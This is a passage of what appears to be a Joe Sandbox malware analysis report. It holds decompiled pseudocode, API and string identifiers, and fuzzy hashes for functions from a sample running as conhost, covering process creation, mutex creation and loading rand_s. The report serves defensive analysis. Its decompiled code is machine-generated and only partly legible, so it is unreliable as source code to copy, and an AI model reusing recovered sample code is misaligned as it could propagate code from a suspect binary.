                        • Instruction Fuzzy Hash: 04713A32A09B4685FB719F66E44236837A8FF49B94F5442BADA6CA7390DF3CE444C310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CF5F0 Relevance: 12.1, APIs: 8, Instructions: 138COMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CF5F0(intOrPtr* __rax, void* __rcx) {
				void* _t5;
				intOrPtr _t6;
				intOrPtr* _t11;
				intOrPtr _t13;

				_t11 = __rax;
				_t13 =  *((intOrPtr*)(__rcx + 0x10));
				if (_t13 == 0) goto 0x935cf648;
				_t6 =  *0x93602350; // 0x1
				_t5 = E00007FF67FF6935D4620(_t6, __rax);
				if (_t11 == 0) goto 0x935cf688;
				if ( *_t11 - _t13 < 0) goto 0x935cf730;
				if ( *((intOrPtr*)(_t11 + 8 + (_t13 - 1) * 8)) == 0) goto 0x935cf6d0;
				return _t5;
			}







                        0x7ff6935cf5f0
                        0x7ff6935cf5fa
                        0x7ff6935cf604
                        0x7ff6935cf606
                        0x7ff6935cf60c
                        0x7ff6935cf617
                        0x7ff6935cf61f
                        0x7ff6935cf631
                        0x7ff6935cf644

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61d0e131f43305a5ceef6b7d95dd00e15aaba39e5cb556556ad6ea62f87c0173
                        • Instruction ID: 073a9fcff668fcc6fae749bdc7206239f456823ef54f6a8545225caf68b89a8a
                        • Opcode Fuzzy Hash: 61d0e131f43305a5ceef6b7d95dd00e15aaba39e5cb556556ad6ea62f87c0173
                        • Instruction Fuzzy Hash: EA51B732A09B4691FE359F25D4525B823A8FF58B88F9884B6DE0DA73A1DF3CE545C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935C3250 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 135COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$wcslen
                        • String ID: $0$@$\??\$basic_string::_M_construct null not valid
                        • API String ID: 1844840824-2971582370
                        • Opcode ID: e0ca755e712fbca67ce55c50b10ec35e500123cbd50fcea896edeb421d257fe0
                        • Instruction ID: 037f4494721d24e3948d6463325042c0a8f0a5b65becacbd853def4e2c191754
                        • Opcode Fuzzy Hash: e0ca755e712fbca67ce55c50b10ec35e500123cbd50fcea896edeb421d257fe0
                        • Instruction Fuzzy Hash: 91514F32608B8591EB70CF15E4523AAB7A8FBC8788F944175EA8D97B99DF7CD104CB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935C2120 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 25%
                        			E00007FF67FF6935C2120(void* __ecx, void* __edi, void* __esp, void* __rax, void* __rdx, long long __r8, long long __r9, intOrPtr _a4, long long _a12, long long _a20, long long _a28, long long _a36, long long _a44, long long _a60, long long _a64, long long _a68, long long _a76, long long _a84, char _a100, void* _a112, char _a224, char _a65824, long long _a65832) {
				long long _v4;
				long long _v12;
				void* _t32;
				void* _t33;
				intOrPtr* _t49;
				intOrPtr* _t50;

				E00007FF67FF6935CEA40(0x10108);
				_a65824 = __r8;
				r8d = 0xfffe;
				_t33 = __ecx;
				_a65832 = __r9;
				memset(??, ??, ??);
				_a64 =  &_a65824;
				E00007FF67FF6935D95C0(__ecx,  &_a224, __rdx, __rdx,  &_a65824);
				r9d = 0;
				memset(__edi, 0, 0xd << 0);
				_a36 =  &_a68;
				_a28 =  &_a100;
				_t49 =  *0x935f8620; // 0x7ff693602068
				_a44 =  &_a60;
				_a100 = 0x68;
				_a68 = 0;
				_a76 = 0;
				_a84 = 0;
				_a60 = 0;
				_a20 = 0;
				_a12 = 0;
				_a4 = 0x8000000;
				_v4 = 0;
				_v12 = 0;
				 *_t49(); // executed
				if (_t33 == 0) goto 0x935c2237;
				_t50 =  *0x935f8640; // 0x7ff693602048
				_t32 =  *_t50();
				E00007FF67FF6935C40CD();
				return _t32;
			}









                        0x7ff6935c212a
                        0x7ff6935c213d
                        0x7ff6935c2147
                        0x7ff6935c214d
                        0x7ff6935c2152
                        0x7ff6935c215a
                        0x7ff6935c217a
                        0x7ff6935c217f
                        0x7ff6935c218b
                        0x7ff6935c218e
                        0x7ff6935c219e
                        0x7ff6935c21ab
                        0x7ff6935c21b0
                        0x7ff6935c21b7
                        0x7ff6935c21be
                        0x7ff6935c21c9
                        0x7ff6935c21d2
                        0x7ff6935c21db
                        0x7ff6935c21e7
                        0x7ff6935c21f0
                        0x7ff6935c21f9
                        0x7ff6935c2202
                        0x7ff6935c220a
                        0x7ff6935c2212
                        0x7ff6935c221b
                        0x7ff6935c2224
                        0x7ff6935c2226
                        0x7ff6935c2235
                        0x7ff6935c223a
                        0x7ff6935c224c

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CreateInternalProcessmemset
                        • String ID: h
                        • API String ID: 101748716-2439710439
                        • Opcode ID: eef3edf5d091453e364523cc21dfba746a8a76b8bf20acd88da7ba6da478e26d
                        • Instruction ID: f07efe2704b35b44b15f52cb1c6ae021d50490386ae8c9ed6d71086ccb7b67a2
                        • Opcode Fuzzy Hash: eef3edf5d091453e364523cc21dfba746a8a76b8bf20acd88da7ba6da478e26d
                        • Instruction Fuzzy Hash: 9A212732608B8092E7609B15F45579BB7A5FBC8784F504135EACD97BA8CF7CD149CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D33F0 Relevance: 3.7, APIs: 2, Instructions: 652COMMON
                        Download Yara Rule
                        C-Code - Quality: 21%
                        			E00007FF67FF6935D33F0(signed int* __rcx, long long __rdx, void* __r8) {
				intOrPtr _t96;
				signed int _t104;
				signed int _t110;
				signed int _t111;
				long long _t134;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t195;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t199;
				intOrPtr _t200;
				intOrPtr _t201;
				intOrPtr _t203;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t208;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t230;
				signed int* _t250;
				intOrPtr* _t251;
				long long _t252;
				long long _t259;
				signed int _t263;

				_t250 = __rcx;
				_t252 = __rdx;
				if (__rcx == 0) goto 0x935d39b0;
				_t251 =  *0x935f8900; // 0x7ff6936023e0
				_t184 =  *_t251;
				if (_t184 == 0) goto 0x935d36b8;
				if ( *((long long*)(_t184 + 0x38)) != 0) goto 0x935d36d8;
				 *((long long*)(_t184 + 0x38)) = 0x935f3fb0;
				E00007FF67FF6935D7890(0x935f3fb0);
				_t185 =  *_t251;
				if (_t185 == 0) goto 0x935d36ed;
				if ( *((long long*)(_t185 + 0x48)) == 0) goto 0x935d3818;
				_t96 =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x48))));
				goto 0x935d34a5;
				_t228 =  *((intOrPtr*)( *_t251 + 0x40));
				_t187 =  *_t251;
				if (_t96 -  *_t228 >= 0) goto 0x935d34c0;
				if ( *((long long*)(_t187 + 0x10)) == 0) goto 0x935d3718;
				if ( *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x10)))) + _t228 * 8)) == 0) goto 0x935d3830;
				if (_t187 == 0) goto 0x935d3730;
				if ( *((long long*)(_t187 + 0x40)) != 0) goto 0x935d3470;
				 *((long long*)(_t187 + 0x40)) = 0x936023a4;
				if (_t96 + 1 -  *0x936023a4 < 0) goto 0x935d347b;
				goto 0x935d350d;
				asm("o16 nop [eax+eax]");
				_t230 =  *((intOrPtr*)(_t187 + 0x48));
				_t188 =  *_t251;
				if (0 -  *_t230 >= 0) goto 0x935d3528;
				if ( *((long long*)(_t188 + 0x10)) == 0) goto 0x935d3798;
				_t263 = _t230 * 8;
				if ( *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x10)))) + _t230 * 8)) == 0) goto 0x935d3890;
				if (_t188 == 0) goto 0x935d37b0;
				if ( *((long long*)(_t188 + 0x48)) != 0) goto 0x935d34d8;
				 *((long long*)(_t188 + 0x48)) = 0x936023a0;
				if (1 -  *0x936023a0 < 0) goto 0x935d34e3;
				if (_t188 == 0) goto 0x935d3b25;
				if ( *((long long*)(_t188 + 0x40)) == 0) goto 0x935d3970;
				_t189 =  *_t251;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x40)))) == 0x100000) goto 0x935d398b;
				if (_t189 == 0) goto 0x935d3bae;
				_t134 =  *((long long*)(_t189 + 0x40));
				if (_t134 == 0) goto 0x935d39c8;
				_t190 =  *_t251;
				if (_t134 != 0) goto 0x935d358b;
				if ( *((long long*)(_t190 + 0x40)) != 0) goto 0x935d3ba5;
				 *((long long*)(_t190 + 0x40)) = 0x936023a4;
				_t104 =  >  ? 0x100000 :  *0x936023a4 + 1;
				if (_t190 == 0) goto 0x935d3d57;
				if ( *((long long*)(_t190 + 0x10)) == 0) goto 0x935d3a90;
				realloc(??, ??);
				_t259 =  *((intOrPtr*)(_t190 + 0x10));
				_t192 =  *_t251;
				if (_t259 == 0) goto 0x935d3f12;
				if (_t192 == 0) goto 0x935d3d95;
				if ( *((long long*)(_t192 + 0x40)) == 0) goto 0x935d3a78;
				_t193 =  *_t251;
				r8d = _t104;
				r8d = r8d -  *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x40))));
				if ( *(_t193 + 0x40) == 0) goto 0x935d3a60;
				memset(??, ??, ??);
				_t195 =  *_t251;
				if (_t195 == 0) goto 0x935d3d31;
				if ( *((long long*)(_t195 + 0x10)) == 0) goto 0x935d3a40;
				_t196 =  *_t251;
				 *((long long*)( *((intOrPtr*)(_t195 + 0x10)))) = _t259;
				if (_t196 == 0) goto 0x935d3c12;
				if ( *((long long*)(_t196 + 0x40)) == 0) goto 0x935d3a30;
				_t197 =  *_t251;
				r12d =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x40))));
				if ( *((long long*)(_t197 + 0x48)) == 0) goto 0x935d3a20;
				r12d = r12d + 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x48)))) = r12d;
				if ( *(_t197 + 0x40) == 0) goto 0x935d3a10;
				_t110 =  *( *(_t197 + 0x40));
				 *__rcx = _t110;
				if ( *(_t197 + 0x40) == 0) goto 0x935d3a00;
				 *( *(_t197 + 0x40)) = _t104;
				if (__rdx == 0) goto 0x935d3afd;
				if ( *((long long*)(_t197 + 0x10)) == 0) goto 0x935d3ac8;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x10)))) + (_t259 +  *(_t193 + 0x40) * 8) * 8)) = __rdx;
				goto 0x935d38b6;
				E00007FF67FF6935D6420(); // executed
				if ( *((long long*)(_t197 + 0x38)) == 0) goto 0x935d342b;
				if ( *_t251 != 0) goto 0x935d36d8;
				E00007FF67FF6935D6420();
				E00007FF67FF6935D7890( *((intOrPtr*)( *_t251 + 0x38)));
				_t199 =  *_t251;
				if (_t199 != 0) goto 0x935d3447;
				E00007FF67FF6935D6420();
				_t200 =  *_t251;
				if ( *((long long*)(_t199 + 0x48)) == 0) goto 0x935d3818;
				if (_t200 != 0) goto 0x935d3452;
				E00007FF67FF6935D6420();
				goto 0x935d3452;
				 *((long long*)(_t200 + 0x10)) = _t259;
				goto 0x935d348a;
				E00007FF67FF6935D6420();
				_t201 =  *_t251;
				if ( *((long long*)(_t200 + 0x40)) == 0) goto 0x935d34b5;
				if (_t201 != 0) goto 0x935d3470;
				E00007FF67FF6935D6420();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t201 + 0x40)))) - _t104 <= 0) goto 0x935d3f1d;
				_t203 =  *_t251;
				if (_t203 != 0) goto 0x935d347b;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t203 + 0x10)) == 0) goto 0x935d3718;
				if ( *_t251 != 0) goto 0x935d3486;
				E00007FF67FF6935D6420();
				_t205 =  *_t251;
				goto 0x935d348a;
				 *((long long*)(_t205 + 0x10)) = _t259;
				goto 0x935d34f2;
				E00007FF67FF6935D6420();
				_t206 =  *_t251;
				if ( *((long long*)(_t205 + 0x48)) == 0) goto 0x935d351d;
				if (_t206 != 0) goto 0x935d34d8;
				E00007FF67FF6935D6420();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t206 + 0x48)))) - _t104 <= 0) goto 0x935d3f25;
				_t208 =  *_t251;
				if (_t208 != 0) goto 0x935d34e3;
				E00007FF67FF6935D6420();
				if ( *((long long*)(_t208 + 0x10)) == 0) goto 0x935d3798;
				if ( *_t251 != 0) goto 0x935d34ee;
				E00007FF67FF6935D6420();
				_t210 =  *_t251;
				goto 0x935d34f2;
				 *((long long*)(_t210 + 0x48)) = 0x936023a0;
				goto 0x935d3459;
				 *_t250 = _t104;
				if (_t252 == 0) goto 0x935d3930;
				if (_t210 == 0) goto 0x935d3ae8;
				_t111 = _t110 & 0xffffff00 |  *((long long*)(_t210 + 0x10)) != 0x00000000;
				if (_t111 == 0) goto 0x935d391c;
				if (_t210 == 0) goto 0x935d3b8b;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x10)))) + _t263)) = _t252;
				if (_t210 == 0) goto 0x935d3ab3;
				if ((_t111 & 0xffffff00 |  *((long long*)(_t210 + 0x38)) != 0x00000000) == 0) goto 0x935d390f;
				if (_t210 != 0) goto 0x935d38c2;
				E00007FF67FF6935D6420();
				goto 0x935d38c2;
				 *_t250 = _t104;
				if (_t252 == 0) goto 0x935d38dc;
				if (_t210 == 0) goto 0x935d3e0e;
				if ( *((long long*)(_t210 + 0x10)) == 0) goto 0x935d3aa3;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x10)))) + _t263)) = _t252;
				if (_t210 == 0) goto 0x935d38f9;
				if ( *((long long*)(_t210 + 0x38)) == 0) goto 0x935d390f;
				E00007FF67FF6935D77D0( *((intOrPtr*)(_t210 + 0x38)));
				return 0;
			}


































                        0x7ff6935d33fe
                        0x7ff6935d3401
                        0x7ff6935d3407
                        0x7ff6935d340d
                        0x7ff6935d3414
                        0x7ff6935d341a
                        0x7ff6935d3425
                        0x7ff6935d3432
                        0x7ff6935d3436
                        0x7ff6935d343b
                        0x7ff6935d3441
                        0x7ff6935d344c
                        0x7ff6935d3459
                        0x7ff6935d3469
                        0x7ff6935d3470
                        0x7ff6935d3474
                        0x7ff6935d3479
                        0x7ff6935d3480
                        0x7ff6935d349c
                        0x7ff6935d34a8
                        0x7ff6935d34b3
                        0x7ff6935d34b8
                        0x7ff6935d34be
                        0x7ff6935d34d0
                        0x7ff6935d34d2
                        0x7ff6935d34d8
                        0x7ff6935d34dc
                        0x7ff6935d34e1
                        0x7ff6935d34e8
                        0x7ff6935d34f7
                        0x7ff6935d3504
                        0x7ff6935d3510
                        0x7ff6935d351b
                        0x7ff6935d3520
                        0x7ff6935d3526
                        0x7ff6935d352b
                        0x7ff6935d3536
                        0x7ff6935d3540
                        0x7ff6935d3549
                        0x7ff6935d3552
                        0x7ff6935d3558
                        0x7ff6935d355d
                        0x7ff6935d3567
                        0x7ff6935d356e
                        0x7ff6935d3575
                        0x7ff6935d3582
                        0x7ff6935d3596
                        0x7ff6935d35a3
                        0x7ff6935d35ae
                        0x7ff6935d35bb
                        0x7ff6935d35c0
                        0x7ff6935d35c3
                        0x7ff6935d35c9
                        0x7ff6935d35d2
                        0x7ff6935d35dd
                        0x7ff6935d35e7
                        0x7ff6935d35ee
                        0x7ff6935d35f1
                        0x7ff6935d35fb
                        0x7ff6935d360d
                        0x7ff6935d3612
                        0x7ff6935d3618
                        0x7ff6935d3623
                        0x7ff6935d362d
                        0x7ff6935d3630
                        0x7ff6935d3636
                        0x7ff6935d3641
                        0x7ff6935d364b
                        0x7ff6935d364e
                        0x7ff6935d3656
                        0x7ff6935d3660
                        0x7ff6935d3664
                        0x7ff6935d366c
                        0x7ff6935d3676
                        0x7ff6935d3678
                        0x7ff6935d367f
                        0x7ff6935d3689
                        0x7ff6935d368e
                        0x7ff6935d3699
                        0x7ff6935d36a8
                        0x7ff6935d36ac
                        0x7ff6935d36b8
                        0x7ff6935d36c5
                        0x7ff6935d36ce
                        0x7ff6935d36d0
                        0x7ff6935d36dc
                        0x7ff6935d36e1
                        0x7ff6935d36e7
                        0x7ff6935d36ed
                        0x7ff6935d36f7
                        0x7ff6935d36fa
                        0x7ff6935d3703
                        0x7ff6935d3709
                        0x7ff6935d370e
                        0x7ff6935d3718
                        0x7ff6935d3723
                        0x7ff6935d3730
                        0x7ff6935d373a
                        0x7ff6935d373d
                        0x7ff6935d3746
                        0x7ff6935d374c
                        0x7ff6935d3757
                        0x7ff6935d375d
                        0x7ff6935d3763
                        0x7ff6935d3769
                        0x7ff6935d3779
                        0x7ff6935d377e
                        0x7ff6935d3784
                        0x7ff6935d378d
                        0x7ff6935d3790
                        0x7ff6935d3798
                        0x7ff6935d37a3
                        0x7ff6935d37b0
                        0x7ff6935d37ba
                        0x7ff6935d37bd
                        0x7ff6935d37c6
                        0x7ff6935d37cc
                        0x7ff6935d37d7
                        0x7ff6935d37dd
                        0x7ff6935d37e3
                        0x7ff6935d37e9
                        0x7ff6935d37f9
                        0x7ff6935d37fe
                        0x7ff6935d3804
                        0x7ff6935d380d
                        0x7ff6935d3810
                        0x7ff6935d381f
                        0x7ff6935d3823
                        0x7ff6935d3830
                        0x7ff6935d3835
                        0x7ff6935d383e
                        0x7ff6935d3849
                        0x7ff6935d384e
                        0x7ff6935d3857
                        0x7ff6935d3864
                        0x7ff6935d386b
                        0x7ff6935d387b
                        0x7ff6935d3884
                        0x7ff6935d3886
                        0x7ff6935d388b
                        0x7ff6935d3890
                        0x7ff6935d3895
                        0x7ff6935d389a
                        0x7ff6935d38a5
                        0x7ff6935d38b2
                        0x7ff6935d38b9
                        0x7ff6935d38c0
                        0x7ff6935d38c6
                        0x7ff6935d38db

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: realloc
                        • String ID:
                        • API String ID: 471065373-0
                        • Opcode ID: 1e3a401cabf507db577af07eb5123edae5da50469f8323c4d18b77a930690b86
                        • Instruction ID: 734cc58497efe12d5deba4601aeab775f89b6f25a5d5e7780d523093bb47955f
                        • Opcode Fuzzy Hash: 1e3a401cabf507db577af07eb5123edae5da50469f8323c4d18b77a930690b86
                        • Instruction Fuzzy Hash: A7624A72A09B0681FA759F09E0823796BA8EF4CB84F5544B7CA6DA7395EF7CE440C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D32C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103COMMON
                        Download Yara Rule

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E00007FF67FF6935D32C0(void* __rax, intOrPtr* __rcx, void* __rdx) {
				intOrPtr _t8;
				void* _t14;

				_t14 = __rax;
				if (__rdx == 0) goto 0x935d33d8;
				if ( *__rcx == 1) goto 0x935d3328;
				E00007FF67FF6935D02C0(__rcx);
				_t1 = _t14 + 8; // 0x8
				E00007FF67FF6935CF8A0(_t1);
				_t8 =  *__rcx;
				if (_t8 == 0) goto 0x935d3340;
				if (_t8 != 1) goto 0x935d33b0;
				E00007FF67FF6935CFBC0(_t1);
				E00007FF67FF6935D04D0(_t14);
				return 0;
			}





                        0x7ff6935d32c0
                        0x7ff6935d32d6
                        0x7ff6935d32df
                        0x7ff6935d32e1
                        0x7ff6935d32e6
                        0x7ff6935d32f0
                        0x7ff6935d32f5
                        0x7ff6935d32f9
                        0x7ff6935d32fe
                        0x7ff6935d3307
                        0x7ff6935d330f
                        0x7ff6935d3321

                        APIs
                          • Part of subcall function 00007FF6935D02C0: calloc.MSVCRT(00000002,000002954BDC1770,00007FF898063CA0,00007FF6935D32E6,?,?,?,00000002,000002954BDC1770,00007FF898063CA0,?,00007FF6935CF65B,000002954BDC1770,00000000,00007FF898063CA0,00007FF6935C2B7A), ref: 00007FF6935D0464
                        • fprintf.MSVCRT ref: 00007FF6935D33CB
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: callocfprintf
                        • String ID: once %p is %d
                        • API String ID: 3366074580-95064319
                        • Opcode ID: 00723cf4e8dccbf85ddf62ee5b7c76497c18d2db4ddbe7ac6238ee089c22699f
                        • Instruction ID: e3dd38a26837b3a2fa76231a638eecd0765e9f873a78038755be32dbf356e339
                        • Opcode Fuzzy Hash: 00723cf4e8dccbf85ddf62ee5b7c76497c18d2db4ddbe7ac6238ee089c22699f
                        • Instruction Fuzzy Hash: D431AC72A0974282FA719B15E5022BE63A8FF8C794F4840B7DE5C97391EE3CE581C600
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935C29A0 Relevance: 3.0, APIs: 2, Instructions: 25synchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CreateErrorLastMutex
                        • String ID:
                        • API String ID: 1925916568-0
                        • Opcode ID: 31c832415eae47506223614dcaa918d6847122a86d481bc17c36b15d07366632
                        • Instruction ID: 6d1dde0ba1c8cf1d0c1b71f95d51fa26b2992f6cf08eed0b0c7d7026bf221367
                        • Opcode Fuzzy Hash: 31c832415eae47506223614dcaa918d6847122a86d481bc17c36b15d07366632
                        • Instruction Fuzzy Hash: 70E0261AE0974641EE0DAB73698723A1165FF4CB88F945C75CD0AE7360DE3C9180C200
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00007FF6935E1170 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 26libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: AddressProc$HandleLibraryLoadModule
                        • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                        • API String ID: 384173800-4041758303
                        • Opcode ID: ff5342f052fda170ab1ed1d071b2ad0a17fd6d7206bfa14234cc1ac0ce3a4651
                        • Instruction ID: 7d3d82e9688199ba568fcd301474e6478b113a19140bb6519c5b26fa740fdbec
                        • Opcode Fuzzy Hash: ff5342f052fda170ab1ed1d071b2ad0a17fd6d7206bfa14234cc1ac0ce3a4651
                        • Instruction Fuzzy Hash: C5F01720E0AA03A1EE269B52FC4357423A8FF09740B8401BACC1DF6364EE2CE949E300
                        Uniqueness

                        Uniqueness Score: -1.00%

